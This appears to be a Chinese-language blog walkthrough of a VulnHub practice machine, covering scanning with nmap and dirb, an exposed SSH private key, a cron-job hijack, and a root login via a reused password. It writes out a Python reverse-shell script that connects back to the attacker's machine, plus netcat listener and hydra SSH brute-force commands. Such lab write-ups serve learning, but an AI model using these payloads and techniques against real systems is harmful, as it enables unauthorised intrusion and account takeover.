【靶机实战2】bron2root

靶机下载

vulbhub.com 靶机下载

安装的话,我使用了virtualbox,VMWare对于一些靶机不兼容,打开不了 : (

基本扫描、分析

netdiscover 扫描到靶机的IP

1.0netdiscover.jpg

浏览器进入查找一些信息 http://192.168.31.156

三个用户:hadi jimmy martin

2.0进入页面.jpg

进行nmap扫描端口

这里扫描到22、80、111

分别进入看看有没有什么信息,但是无果~~

3.0nmap.jpg

使用dirb查找目录文件(也可以使用nikto

扫描后,分别进入这些文件

在icons文件夹处发现了一个txt文本,打开一看是一个私钥!!

将这个文件拷贝到kali的家目录下,改名为id_rsa

4.0dirb.jpg

4.1nikto.jpg

5.0icons私钥.jpg

进行ssh连接

分别尝试了三个用户之后

登入进了martin用户

6.0ssh连接martin.jpg

搜索信息

查看隐藏文件、进入etc/passwd文件里面查看用户信息

7.0隐藏文件.jpg

7.1etc-passwd文件.jpg

进入家目录,看到hadi、jimmy文件夹,尝试进入

hadi文件夹进入后,好像什么东西可以利用的

但是进jimmy文件夹的时候没有权限

7.2home目录.jpg

无果~~

*在/etc/crontab发现定时任务

进入/etc/crontab/目录

发现jimmy用户在每隔5分钟就会自动执行/tmp/sekurity.py文件

但是在进入/tmp/目录下并未发现该文件

于是就想到可以利用python反弹shell进入jimmy用户

8.0crontab文件夹.jpg

*利用python反弹shell

反弹shell简述-知乎

在/tmp/目录下编写一个名为sekurity.py的反弹shell文件,内容如下:

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.31.138",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);

但是这里没有vim编辑器,就使用自带的nano编辑器,命令如下:

nano sekurity.py
输入内容

保存 Ctrl + o 回车确定文件名
退出 Ctrl + x

*使用netcat监听该端口

nc命令总结

在kali上使用netcat进行监听

nc -lvp 6666

等待一会呃,成功进入jimmy用户

9.0nc监听.jpg

但是经过一番搜索,没有东西。。。。

只剩下hadi用户了

*利用hydra爆破ssh

最后尝试hadi用户

需要搞到一个字典

可以去在线字典生成器网站 字典生成网站,也可以使用一些字典生成的脚本工具(网上有,也可找我要)

生成字典后进行爆破

hydra -l hadi -P result.txt 192.168.31.156 ssh 
-l 指定用户名
-P 指定密码文件	用大写代表文件,小写就是用户密码

10.0hydra爆破.jpg

进入hadi用户找到flag

ssh连接进入hadi用户

ssh hadi@192.168.31.156

11.0hadi.jpg

在hadi用户这里也没有找到flag

于是就想尝试进入root用户

显示需要密码,就顺手输入了hadi用户的密码hadi123

进入到root用户

12.0root.jpg

到家目录看到flag.txt

13getflag.jpg

OK!!!

整理

带*号的就是我不太熟悉的地方,我个人觉得尝试去根据别人写的博客去打靶机是个很不错的学习途径,可以涉及到很多知识面,就比如nc那部分刚刚了解只是略知一二,但是实战一下能够更好的理解 : p

参考

文章:

https://www.cnblogs.com/wszme/p/12357356.html

视频:

https://www.bilibili.com/video/BV1VZ4y147LH?t=955

posted @ 2020-06-08 20:09  labster  阅读(570)  评论(1编辑  收藏  举报